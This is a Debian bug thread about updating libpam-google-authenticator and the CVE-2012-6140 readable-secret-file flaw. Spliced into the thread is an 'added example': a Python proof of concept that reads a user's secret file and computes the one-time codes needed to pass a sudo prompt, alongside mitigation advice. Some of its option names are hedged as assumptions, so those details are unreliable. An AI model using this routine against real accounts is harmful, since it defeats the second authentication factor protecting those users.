Bug#666129: Please update to a newer upstream release

2013-04-18 Thread Alexander Wirt
tag 666129 security
severity 666129 critical
retitle 666129 new upstream version fixes security problem with the secret file
thanks

On Sat, 22 Sep 2012, rk wrote:

 There is also a severe and somewhat undocumented security issue fixed
 by the user= parameter added in this commit:
 https://code.google.com/p/google-authenticator/source/detail?r=c3414e9857ad64e52283f3266065ef3023fc69a8
 
 Without this option, the SECRET file is required to be user-readable
 which can expose the secret to an attacker under certain
 configurations (notably when required for `sudo`, but not system
 login).
This is indeed a security problem. Lenart, do you need any help to get the
package updated? I also think it doesn't make sense to ship the package in
this state with wheezy and therefore I asked for removal from testing.

Alex


-- 
To UNSUBSCRIBE, email to debian-bugs-dist-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org



Bug#666129: Please update to a newer upstream release

2013-04-18 Thread Salvatore Bonaccorso
Control: retitle 666129 new upstream version fixes security problem with the secret file (CVE-2012-6140)

Hi all

On Thu, Apr 18, 2013 at 09:13:24AM +0200, Alexander Wirt wrote:
 tag 666129 security
 severity 666129 critical
 retitle 666129 new upstream version fixes security problem with the secret file
 thanks
 
 On Sat, 22 Sep 2012, rk wrote:
 
  There is also a severe and somewhat undocumented security issue fixed
  by the user= parameter added in this commit:
  https://code.google.com/p/google-authenticator/source/detail?r=c3414e9857ad64e52283f3266065ef3023fc69a8
  
  Without this option, the SECRET file is required to be user-readable
  which can expose the secret to an attacker under certain
  configurations (notably when required for `sudo`, but not system
  login).
 This is indeed a security problem. Lenart, do you need any help to get the
 package updated? I also think it doesn't make sense to ship the package in
 this state with wheezy and therefore I asked for removal from testing.

A CVE was assigned for this issue: CVE-2012-6140, see[1].

 [1]: http://marc.info/?l=oss-security&m=136630281802738&w=2

Regards,
Salvatore





Bug#666129: Please update to a newer upstream release

2012-10-24 Thread Phil Armstrong
Package: libpam-google-authenticator
Version: 20110413.68230188bdc7-1.1
Followup-For: Bug #666129

Upstream released version 1.0 in May by the way:

  http://code.google.com/p/google-authenticator/downloads/detail?name=libpam-google-authenticator-1.0-source.tar.bz2

cheers, Phil





Bug#666129: Please update to a newer upstream release

2012-09-22 Thread rk
There is also a severe and somewhat undocumented security issue fixed
by the user= parameter added in this commit:
https://code.google.com/p/google-authenticator/source/detail?r=c3414e9857ad64e52283f3266065ef3023fc69a8

Without this option, the SECRET file is required to be user-readable
which can expose the secret to an attacker under certain
configurations (notably when required for `sudo`, but not system
login).


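A worked illustration of why a user-readable secret file defeats a second factor that is enforced only for `sudo` and not for system login. This is an added example, not code from the bug report or from the google-authenticator project. It parses the `~/.google_authenticator` file layout (base32 seed on the first line, `"`-prefixed option lines, then emergency scratch codes), and derives the HOTP (RFC 4226) and TOTP (RFC 6238) codes from that seed the same way the PAM module does, so any process running as the login user, or anyone holding that user's password, can read the file and type a valid code at the sudo prompt. The sample file contents are constructed here from the RFC 4226/6238 test key and are not a real secret; the option names `TOTP_AUTH`, `WINDOW_SIZE` and `HOTP_COUNTER`, and the window arithmetic, are taken from the module's documented behaviour as I remember it and should be treated as assumptions.

```python
"""Added example: derive one-time codes from a readable google-authenticator secret file."""
import base64
import hashlib
import hmac
import struct

# Constructed sample ~/.google_authenticator contents (NOT a real secret).
# First line: base32-encoded seed. Lines starting with '"': module options.
# Remaining lines: emergency scratch codes.
# The seed is the RFC 4226 / RFC 6238 test key "12345678901234567890".
SAMPLE_SECRET_FILE = """GEZDGNBVGY3TQOJQGEZDGNBVGY3TQOJQ
" RATE_LIMIT 3 30
" WINDOW_SIZE 3
" TOTP_AUTH
12345678
23456789
"""


def parse_secret_file(text):
    """Return (raw_key_bytes, option_strings, scratch_codes) from the layout above."""
    lines = [line.strip() for line in text.splitlines() if line.strip()]
    if not lines:
        raise ValueError("empty secret file")
    seed_b32 = lines[0]
    options, scratch = [], []
    for line in lines[1:]:
        if line.startswith('"'):
            options.append(line[1:].strip())
        else:
            scratch.append(line)
    # The module writes the seed without '=' padding; b32decode wants it padded.
    key = base64.b32decode(seed_b32 + "=" * (-len(seed_b32) % 8))
    return key, options, scratch


def hotp(key, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian 64-bit counter, then dynamic truncation."""
    mac = hmac.new(key, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    binary = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, binary % (10 ** digits))


def totp(key, unix_time, step=30, digits=6):
    """RFC 6238 TOTP: HOTP with counter = floor(unix_time / step)."""
    return hotp(key, int(unix_time) // step, digits)


def accepted_codes(key, unix_time, window_size=3, step=30):
    """Codes the verifier would accept at unix_time for a given WINDOW_SIZE.

    Assumption: WINDOW_SIZE=n allows (n-1)//2 steps of clock skew before and
    n//2 steps after the current step, so n=3 means the previous, current and
    next 30-second code. Used here only to show how wide the attacker's target is.
    """
    base = int(unix_time) // step
    skews = range(-((window_size - 1) // 2), window_size // 2 + 1)
    return [hotp(key, base + d) for d in skews]


def attacker_code_for_sudo(secret_file_text, unix_time):
    """What someone who can read the secret file types at the sudo prompt.

    In TOTP mode only the seed and the clock are needed. In counter-based HOTP
    mode the module keeps the next expected counter in the same file (assumed
    here as a 'HOTP_COUNTER n' option), so read access leaks that as well.
    """
    key, options, _scratch = parse_secret_file(secret_file_text)
    if "TOTP_AUTH" in options:
        return totp(key, unix_time)
    counter = 0
    for opt in options:
        parts = opt.split()
        if parts and parts[0] == "HOTP_COUNTER" and len(parts) > 1:
            counter = int(parts[1])
    return hotp(key, counter)


if __name__ == "__main__":
    key, options, scratch = parse_secret_file(SAMPLE_SECRET_FILE)
    print("seed:", key, "options:", options, "scratch:", scratch)
    print("code at t=59:", attacker_code_for_sudo(SAMPLE_SECRET_FILE, 59))
    print("accepted at t=59:", accepted_codes(key, 59))
```

The mitigation the bug refers to is to stop storing the seed where the login user can read it: with the `user=` option the module switches to a dedicated account to read the secret, so the file can be owned by that account and mode 0400, for example (my illustration of the documented options, not a line from the bug) `auth required pam_google_authenticator.so user=gauth secret=/var/lib/gauth/${USER}/.google_authenticator`. A quick check on an existing deployment is whether `stat ~/.google_authenticator` shows the file owned and readable by the same user whose sudo the module is meant to protect; if it is, the code above is all an attacker with that user's shell needs.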



Bug#666129: Please update to a newer upstream release

2012-03-28 Thread Faidon Liambotis
Package: libpam-google-authenticator
Version: 20110413.68230188bdc7-1.1
Severity: wishlist

Hi,

I would like to have a newer version of google-authenticator in the
archive; the version currently in Debian is almost a year old and
several new features have been added to upstream's trunk (it's
unfortunate that upstream doesn't believe in releases…).

In particular, I was interested in having counter-based HOTP instead of
TOTP, since the box I want to use libpam-google-authenticator in doesn't
have an RTC and relying on not having network outages (for NTP) is a
no-go for this. I was happy to see that upstream supports this, only to
be disappointed that this isn't in Debian :-)

If you're busy, I can certainly help with the upload and do an NMU,
although I'm afraid I don't have the time or will to help with the
maintenance in general.

Thanks, and thank you for packaging google-authenticator. 

Regards,
Faidon


